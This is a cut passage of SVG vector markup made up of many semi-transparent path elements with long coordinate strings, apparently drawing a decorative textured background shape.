d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.48-.45,3-.92,4.43-1.4s2.73-1,4.14-1.36c2.09-.51,4.21-.88,6.55-1.35l.93,2.22c4.46-4.06,8.06-7.14,15.18-6.16C686,9,694,12.55,702.68,11.92a1.92,1.92,0,0,1,1.27.45c3,2.56,4,.72,4.66-2,.21-.87.53-1.72.79-2.59-5.35,0-10.71,0-16.06-.09A20,20,0,0,1,689.59,6.87ZM654.52,37.15c2.27.73,3.48,4,2.18,6.56a2.69,2.69,0,0,1-2.54.71,46,46,0,0,1-5.11-3.74C649.79,37.38,651.49,36.18,654.52,37.15Zm-13.87,6.29c-2.69-.9-5.43-1.65-8.51-2.58,1.6-5.08.08-11.16,5.71-14.76a42.76,42.76,0,0,1,3.9,4.46c.48.72.17,2,.21,3,0,.45,0,.9,0,1.35a63.89,63.89,0,0,1,1.36,6.91C643.53,43.65,642.33,44,640.65,43.44Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M704.78,41.63c-.52,3.77-1.6,4.69-5.5,4.49,0-3.14,2.62-3.69,4.68-4.74a1,1,0,0,0,0-.49,30,30,0,0,0-4.4-3.71c-.91-.53-2.35-.11-3.55-.12,0,1.14,0,2.28,0,3.41s.79,2.16.45,2.9c-1.18,2.64-1.06,4.29,2.27,4.71a13.59,13.59,0,0,1,3.13,1.19L706,44.44c-.25-1-.5-2-.74-3A.67.67,0,0,0,704.78,41.63Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.46,63.7c-2.38-.94-4.73-2.35-7.16-2.52-2.15-.15-4.3-.15-6.46-.1l3.56,3.78c2,0,4.05,0,6.07,0l1.07-.38Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M372.31,61.37c1,.48,2,.93,3,1.44,1.29.66,2.55,1.36,3.83,2h5.28l-3.56-3.78C378,61.15,375.15,61.31,372.31,61.37Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M800.56,9.76v4.17c1.09-.25,2.2-.45,3.28-.74,4.21-1.14,8.37-1.59,12.42.6l1.36,0L819,12.51a5.11,5.11,0,0,0-1.43-.7C811.89,11.1,806.22,10.44,800.56,9.76Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M790.24,10.21l4.23.85h2v-.69C794.45,9.12,792.39,7.81,790.24,10.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M560.88,52.66l.74,1.36,2,0,.81-1.24-.86-.35Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.05,70.31l1.39.76.68-.07c0-.71,0-1.42-.08-2.13Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M907.69,33.92a2.27,2.27,0,0,0-.64,1.7c.11.45,1.06,1.14,1.38,1,2-.74,3.93-1.67,5.89-2.54l-4.5-2.05A19.13,19.13,0,0,0,907.69,33.92Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M774.14,6.48c-7,.2-14.12-2-21.12.67-1.25.47-3-.51-4.53-.66-1.69-.16-3.39-.12-5.09-.17.06.21.12.62.18.62,3-.07,4.66,5.33,8.51,2.15.26-.22,1.08.12,1.59.33A12.36,12.36,0,0,0,764.73,9a7.7,7.7,0,0,1,4.15-1.16c4.94.7,9.81,1.86,14.74,2.64a23.59,23.59,0,0,0,4.87-.23c-.69-.5-1.32-1.28-2.08-1.44C782.34,7.86,778.21,6.36,774.14,6.48Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M718.37,6.05c-1.07,2.1-2.62,1.68-4.27,1a31.91,31.91,0,0,0,1.15,4.13c.67,1.61,2,1.72,2.69.2,1.27-3,3.11-2.54,4.43-1.62l8.09-4c-3.61-.22-7.22-.47-10.83-.6A1.85,1.85,0,0,0,718.37,6.05Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M742.11,6.43l-7.61-.72C737.53,9.47,740,9.71,742.11,6.43Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M856.46,18.52c-.18,1.2-.37,2.39-.62,4,2.64-.18,5.09-.75,7.41-.4,2.49.37,4.86,1.61,7.29,2.46a1.37,1.37,0,0,0,.67,0c3.34-.5,6,.93,8.83,2.53,1.63.95,3.74,1.06,5.64,1.55l3.41-3.4a22,22,0,0,0-2.23-.68Q871.67,21.57,856.46,18.52Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M488.92,74.79c.16.06.78-1.15,1.18-1.77l-11-1.2C481.74,74.91,485.7,73.64,488.92,74.79Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M659.68,17.31c-.72.08-1.33,1.08-2,1.67.74.74,1.37,1.88,2.23,2.1s1.69-.75,2.55-1.19c-.19-.44-.39-.87-.59-1.31C661.14,18.12,660.36,17.24,659.68,17.31Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M535.75,59.42,533,62.18l4.71-.66Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M537.23,68.3c2.46-2.09,2.67-4,.66-6.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M530.08,65.21l1.9-2.76L528.33,60C528.79,61.41,529.26,62.79,530.08,65.21Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M374.52,67.73a19.45,19.45,0,0,1-14.27,2,18.31,18.31,0,0,0-4.75-.24c.4,1.07.81,2.13,1.21,3.19a6.66,6.66,0,0,0,1,.11c7.47.14,14.95.07,22.42.08q-1.46-2.59-2.92-5.19C376.3,67.69,375.23,67.36,374.52,67.73Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M348.81,67.74c-.49-.42-1.52-.22-2.31-.31l-2.6,1.71-2.1-1.4-1.34-.53c-3.08.27-6.49,1.53-9.15.61a78,78,0,0,0-15.47-4.16c-6.31-.83-12.44-2-18.3,1.54a49,49,0,0,0,5.8.14c1.6-.15,3.4-1.48,4.71-1.06,6.18,2,13.42-.24,18.89,4.64a3.66,3.66,0,0,0,2.22.68c3.34.07,6.68-.09,10,.06,1.84.09,3.65.69,5.48,1,2.62.37,5.27.56,7.87,1,1.42.23,2.8.84,4.19,1.09-.4-1.06-.81-2.12-1.21-3.19C353.18,69.56,350.86,69.5,348.81,67.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M405.76,61.52c.28-2,0-3.65-1.7-3.6L400.4,60l-1.3.76a4.77,4.77,0,0,1-1.22,3.11l4.5-1C402.86,62,403.82,61.39,405.76,61.52Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M398.15,64.26l-.54-.19a3.19,3.19,0,0,1-2.69-.09l-.13-.24.21-.18-.54.14.38.15a11.37,11.37,0,0,1-3,.94l-1.38,0-3.73,1.32,1.42.15a22.56,22.56,0,0,1,4.12,2.4c3.56,3.25,5.89,3.22,8.89-.42l.65-1.35c0-.85,0-1.73.13-2.53A12,12,0,0,0,398.15,64.26Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.88,63.89a1.81,1.81,0,0,1-.27.18l.54.19a12,12,0,0,1,3.8.12,4.38,4.38,0,0,1,.43-1.49Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M394.84,63.85l-.38-.15-2.92.73-1.07.38,1.38,0A11.37,11.37,0,0,0,394.84,63.85Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M293.23,62.28c-3.39.51-6.81.82-10.2,1.29a25.57,25.57,0,0,0-3.07.78c3.6.21,7.19.47,10.79.62,1.82.07,3.65-.06,5.48-.09C296.06,63.05,295.38,62,293.23,62.28Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M381.28,72.89c2,.52,3.14-.28,3.48-2.33.19-1.18.52-2.34.79-3.51l-2.08.58Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M419.42,60.3c-.14-.62-2.26-1.23-3.36-1.08-.95.13-2.57,1.52-2.45,2a3.58,3.58,0,0,0,.91,1.54l6.14.81A12.24,12.24,0,0,1,419.42,60.3Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M416.07,66a3.28,3.28,0,0,1-3.5.35,25.63,25.63,0,0,1-4.73.71,2.23,2.23,0,0,0,1.79.7c2.87.1,5.75-.14,8.63-.16,1.26,0,2.79-.18,3.68.45.62.43.79,2.32.39,3.2-1.43,3.17.41,3.24,2.63,3.16.88-3.25,3.72-2.82,6.1-3.27-.16-.29-.25-.78-.48-.85-3.11-1-6-2.18-8.09-4.26C420.35,66,418.21,66,416.07,66Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M420.66,63.6l-6.14-.81c.42.46.91.9,1.33,1.33s.93.36,1.49.56A6.77,6.77,0,0,1,416.07,66c2.14,0,4.28,0,6.42,0A10.5,10.5,0,0,1,420.66,63.6Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M412.57,66.32a10.51,10.51,0,0,1-2.88-2,19.22,19.22,0,0,0-3.79-2.16c.62,1,1.92,2.13,1.73,2.91a2.26,2.26,0,0,0,.21,2A25.63,25.63,0,0,0,412.57,66.32Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1895.24,114.11a8,8,0,0,1,1.56-2.31,11.38,11.38,0,0,1-1.64.24C1895.17,112.73,1895.19,113.42,1895.24,114.11Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1905.75,106c0-.09.08-.18.11-.27l-1.19-.76c-5.26.56-7.07-.66-9.71-4.92-.77-1.25-3.3-1.84-5.07-1.94-2.62-.15-5,.42-7.87-.48-2.42-.78-5.66,1-9.08,1.79a7.37,7.37,0,0,1-.4-1.8c-.18-3-2.6-4.3-5.11-2.8a6.53,6.53,0,0,1-2.39,1.06c-3.41.41-6.84.81-10.26.92a27.36,27.36,0,0,1-5.26-.81l-3.89-.68a11.48,11.48,0,0,0,2.06,2.26c2.17,1.39,4.47,2.57,6.7,3.87.85.5,1.65,1.58,2.45,1.55,3.57-.12,7.14-.54,11.48-.92a8.36,8.36,0,0,1,1.19,1.93,8.2,8.2,0,0,0,7.45,5c.56,0,1.08.73,1.68.85,2,.4,4,.68,6,1-.24-1.53-.5-3.06-.72-4.6-.12-.86-.48-1.9-.15-2.56a2.76,2.76,0,0,1,2.16-1.12,51.21,51.21,0,0,1,5.5.55l.92-1.3a38.5,38.5,0,0,1,2.41,5.92,21,21,0,0,1,.41,4.29,11.38,11.38,0,0,0,1.64-.24,4.84,4.84,0,0,1,2.63-1.43v-5.44A6.52,6.52,0,0,0,1905.75,106Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.11,105.9l-.25-.16c0,.09-.07.18-.11.27Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1906.31,106l-.2-.13-.36.11c-.87,2.2-1.66,4.4-.56,6.6,0-3.84,1.92,0,3.84-1.92a6.49,6.49,0,0,0-1.87,4.88c.08,0,.16,0,.25.06,1.19.38,2.88-.85,4.34-1.34-.64-1.15-1.21-2.34-1.94-3.42C1908.7,109.22,1907.48,107.64,1906.31,106Z\" transform=\"translate(0 0)\"\n opacity=\"0.2\"></path>\n <path d=\"M1905.19,112.61c-1.1-2.2-.31-4.4.56-6.6a6.52,6.52,0,0,1-6.32-1.08v5.44a7.28,7.28,0,0,1,3.42.33c.57.17.94,1,1.41,1.51-.47.39-.92.82-1.41,1.18-1.16.85-2.33,1.68-3.5,2.51a10.94,10.94,0,0,1,7.81-.33,6.49,6.49,0,0,1,1.87-4.88C1907.11,112.61,1905.19,108.77,1905.19,112.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1841.25,93.09l-2.65,1.15c-.44,1.45-.88,2.9-1.39,4.61l7.11-3.44-1.62-1.88Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1805.12,94.7l.12,1.32c1.9.79,3.55.73,4.61-1.34l-2.87-1Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1610.26,74.9c-3-2.13-6.32-3.74-9.72-5.7-1.09,2.47-1.5,4.62-4.13,3-.25-.15-1.88,1.28-2.25,2.23-.27.7.45,1.8.76,2.82l-3.83.53a15.57,15.57,0,0,1-.45-3.63c.42-3.24-2.32-3.61-4.14-4.18-2.08-.66-4.46-.36-6.71-.47-4.33.72-1.18,5.15-3.41,8.37l-3-5.61c-5.69-1.77-11.75,2.1-17-2a.46.46,0,0,0-.33-.07c-3.42.13-6.84.22-10.25.46a7.76,7.76,0,0,0-2.34,1,76.7,76.7,0,0,0,11,.88c3.11,0,6.07,3.85,9.82,1.13,4.48,2.21,9.91,2.83,12.88,7.72,2.49-.31,4.22-1.21,4.2-4.18,0-.68,1.05-2,1.44-1.94a3.9,3.9,0,0,1,2.48,1.54c.49.79,0,2.29.57,2.91a21.57,21.57,0,0,0,3.84,2.76c.55-2,1.63-2.65,3.75-2,1,.3,2.26-.22,3.4-.36l.61-.79c.34-1,.42-2.56,1.06-2.83,2.55-1.06,5.31-2.4,7.91-2.24,1.38.09,2.58,3,3.87,4.69l.85.6,4.24-4.74-.08,0-.07-.06C1613.61,75.42,1612.25,76.32,1610.26,74.9Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path 